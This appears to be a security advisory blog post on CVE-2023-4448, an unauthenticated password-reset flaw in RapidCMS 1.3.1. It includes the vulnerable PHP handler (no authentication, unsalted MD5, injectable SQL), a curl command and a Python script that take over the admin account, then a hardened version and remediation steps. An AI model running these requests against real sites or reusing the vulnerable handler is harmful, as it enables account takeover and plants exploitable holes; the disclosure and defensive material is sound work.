OpenRapid RapidCMS is a PHP-based content management system. Version 1.3.1 contains a critical vulnerability, tracked as CVE-2023-4448, in its password reset functionality. A remote attacker can use it to take over a site running the vulnerable version. In this post we explain what went wrong, show how the exploit works, and describe how to keep your site safe.

What’s the Problem?

The vulnerability is in the file admin/run-movepass.php, specifically in how the password and password2 parameters are handled during the password reset or recovery process.

Short summary:
A remote user can reset an admin’s password without proper verification, giving an attacker unauthorized access to the site.

Technical identifiers:
- VulDB entry: VDB-237569
- Patch commit: 4dff387283060961c362d50105ff8da8ea40bcbe

This is a *weak password recovery* flaw. Here is what happens:

- The endpoint reads the new password straight from the request (parameters password and password2) and applies it to the named account without checking that the caller is logged in as that account, knows its current password, or holds a valid reset token.

Suppose the admin reset/password change form is submitted to this endpoint:

POST /admin/run-movepass.php

Normal (expected) request parameters:

username=admin&password=NewPassword1!&password2=NewPassword1!

Because the endpoint never checks who is making the request, an attacker can send the same request with curl, Burp Suite, or a browser:

curl -X POST \
  -d "username=admin&password=hacked1234&password2=hacked1234" \
  https://victim.site/admin/run-movepass.php

Vulnerable PHP

<?php
// admin/run-movepass.php (vulnerable)

if ($_POST['password'] === $_POST['password2']) {
    $username = $_POST['username'];        // target account comes straight from the request
    $new_pass = md5($_POST['password']);   // unsalted MD5, no work factor
    // WARNING: No verification here! No session check, no current password, no reset token.
    // The query is also built by string interpolation rather than a prepared statement.
    $sql = "UPDATE users SET password = '$new_pass' WHERE username = '$username'";
    mysqli_query($conn, $sql);
    echo "Password changed!";
} else {
    echo "Passwords do not match.";
}

Here is the same request using Python's requests library:

import requests

# The endpoint and the three parameters the vulnerable handler reads from the POST body.
url = 'https://victim.site/admin/run-movepass.php'
data = {
    'username': 'admin',
    'password': 'attackerPass!23',
    'password2': 'attackerPass!23'
}

r = requests.post(url, data=data, timeout=10)
# The handler echoes this string on success (see the PHP above).
if "Password changed!" in r.text:
    print("[+] Exploit likely successful!")
else:
    print("[-] Exploit failed")

The attacker can then log in as admin with the password they chose, and the legitimate admin is locked out until the password is reset again.
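For comparison, here is how the same handler looks once the missing checks are in place. This is an added example written for this post, not the project's own patch; it assumes a prior login step stored the authenticated user's integer id in $_SESSION['user_id'] and a per-session CSRF token in $_SESSION['csrf_token'], and that $conn is an open mysqli connection to a users table with integer id and password columns.

```php
<?php
// admin/run-movepass.php -- hardened version (illustrative example, not the project's patch).
// Assumptions: a prior login step stored the authenticated user's integer id in
// $_SESSION['user_id'] and a per-session CSRF token in $_SESSION['csrf_token'];
// $conn is an open mysqli connection (e.g. from a config include).
declare(strict_types=1);
session_start();
// require_once __DIR__ . '/../config.php'; // assumed to define $conn (mysqli)

function fail(string $msg, int $status = 400): void
{
    http_response_code($status);
    echo htmlspecialchars($msg, ENT_QUOTES, 'UTF-8');
    exit;
}

// 1. Only accept POST: a password change must never be triggerable by a GET link.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    fail('Method not allowed', 405);
}

// 2. Owner check: the caller must already be authenticated. The account whose password
//    changes is taken from the session, never from a username parameter in the request.
$userId = $_SESSION['user_id'] ?? null;
if (!is_int($userId)) {
    fail('Login required', 401);
}

// 3. CSRF check, so a logged-in admin cannot be tricked into submitting this form.
$token = $_POST['csrf_token'] ?? '';
if (!is_string($token) || !hash_equals($_SESSION['csrf_token'] ?? '', $token)) {
    fail('Invalid request token', 403);
}

$current = (string) ($_POST['current_password'] ?? '');
$new     = (string) ($_POST['password'] ?? '');
$new2    = (string) ($_POST['password2'] ?? '');

if ($new === '' || $new !== $new2) {
    fail('Passwords do not match.');
}
if (strlen($new) < 12) {
    fail('Password must be at least 12 characters.');
}

// 4. Re-authenticate: require the current password before accepting a new one, so a
//    hijacked session alone is not enough to lock the real owner out.
$stmt = $conn->prepare('SELECT password FROM users WHERE id = ?');
$stmt->bind_param('i', $userId);
$stmt->execute();
$stmt->bind_result($storedHash);
$found = $stmt->fetch();
$stmt->close();

if ($found !== true || !password_verify($current, (string) $storedHash)) {
    fail('Current password is incorrect.', 403);
}

// 5. Store a salted, slow hash (bcrypt by default) through a prepared statement instead of
//    interpolating an unsalted MD5 into a SQL string.
$hash = password_hash($new, PASSWORD_DEFAULT);
$stmt = $conn->prepare('UPDATE users SET password = ? WHERE id = ?');
$stmt->bind_param('si', $hash, $userId);
$stmt->execute();
$stmt->close();

// 6. Rotate the session id after a credential change.
session_regenerate_id(true);
echo 'Password changed!';
```

Two caveats when applying this shape to a real install. Rows that still hold MD5 hashes from the old code will not pass password_verify, so they need a migration (for example, re-hashing on the next successful login). And this handler only covers a logged-in user changing their own password; a forgotten-password flow needs a separate endpoint that checks a single-use, expiring token delivered to the account's verified email address before it accepts a new password.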

References and Resources

- VulDB entry VDB-237569
- Patch commit 4dff387283060961c362d50105ff8da8ea40bcbe on GitHub
- NVD entry for CVE-2023-4448 (pending at the time of writing)

Update immediately:

- Apply the patch commit listed above to every RapidCMS 1.3.1 install you run.

Stay safe and keep your software up to date. If you might be affected, patch now, then check your web server logs for POST requests to /admin/run-movepass.php that did not come from a logged-in admin session, reset the admin password yourself, and review your user accounts for any that were changed or added unexpectedly.


*Exclusive content based on public sources and first-hand analysis. Share with your sysadmin friends to help keep the web secure!*

Timeline

Published on: 08/21/2023 02:15:10 UTC
Last modified on: 11/07/2023 04:22:37 UTC